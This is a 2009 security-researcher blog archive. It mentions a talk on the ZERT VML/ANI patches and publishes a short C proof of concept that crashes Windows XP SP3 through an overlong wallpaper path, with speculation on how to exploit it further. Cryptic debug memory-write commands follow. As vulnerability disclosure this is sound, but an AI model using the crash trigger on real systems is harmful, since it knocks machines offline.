Archive for February, 2009

VML + ANI ZERT Patches

Tuesday, February 3rd, 2009

It is time to release an old presentation about the VML and ANI vulnerabilities that were patched by ZERT. It explains the vulnerabilities and how they were closed. It is quite technical; Assembly knowledge is required if you wanna really enjoy it. I also gave a talk using this presentation at CCC 2007. It so happened that I wrote the patches, with the extensive help of the team, of course.

ZERT Patches.ppt

Oh No, My XPSP3

Monday, February 2nd, 2009

#include <windows.h>
#include <string.h>   /* memset */

int main()
{
 /* 2000-byte buffer, the first 1000 bytes filled with 'c': a 500-WCHAR
    string of 0x6363 (well past MAX_PATH, and no path structure at all),
    followed by the zero terminator left from the initializer */
 WCHAR c[1000] = {0};
 memset(c, 'c', 1000);
 SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

 /* read the wallpaper path back; uiParam is the buffer size in characters */
 WCHAR b[1000] = {0};
 SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
 return 0;
}

Two posts ago I talked about vulnerabilities, so here’s some zero day. This will crash your system, unless you’re on Vista (which is already immune to it). And why the heck is this still not closed on SP3?

It might be exploitable; I didn’t research it any further than the BSOD of the security cookie… Maybe on some compilations without /GS it can be easily exploited. Or maybe overwriting enough of the stack to trigger an exception could be it.

“Remember to let her into your heart,
Then you can start to make it better” – The Beatles.

Escape

Sunday, February 1st, 2009

Wanted to share this with the world:

e 0:0 cc
e 100 c4 c4 54 27